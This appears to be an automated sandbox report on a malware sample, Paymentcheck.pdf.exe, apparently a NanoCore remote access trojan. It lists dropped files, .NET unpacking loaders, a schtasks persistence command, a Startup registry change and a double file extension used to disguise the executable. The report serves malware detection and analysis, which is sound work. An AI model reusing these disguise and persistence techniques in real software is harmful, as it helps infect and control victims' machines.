Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Paymentcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Paymentcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: Paymentcheck.pdf.exe, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: msbuildd.exe.0.dr, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Paymentcheck.pdf.exeStatic PE information: 0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC]
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006646EC push ss; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006646F8 push ss; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066457E push cs; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_00664578 push cs; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066375A push ecx; retf
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006645A8 push 0000000Fh; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066458A push cs; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_00664590 push cs; ret
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0793B197 push 5D64812Ch; ret
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A4289 push es; retf
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A4469 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A44A3 push es; retf
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECC200 push ds; iretd
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192401 push esi; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192459 push esi; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061922FF push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192310 push esi; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192039 push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619305F pushad ; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061920D8 push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192130 push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192189 push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061921DF push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061921F0 push ebp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619AF76 push 8B000005h; retf
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06191DE0 push esp; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619FA78 push esp; retf
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619B82B push es; ret
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619182F push eax; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619197F push ecx; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F9DA pushad ; iretd
Source: initial sampleStatic PE information: section name: .text entropy: 7.98540121704
Source: initial sampleStatic PE information: section name: .text entropy: 7.98540121704
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsssJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe\:Zone.Identifier:$DATAJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Uses an obfuscated file name to hide its real file extension (double extension)Show sources
Source: Possible double extension: pdf.exeStatic PE information: Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
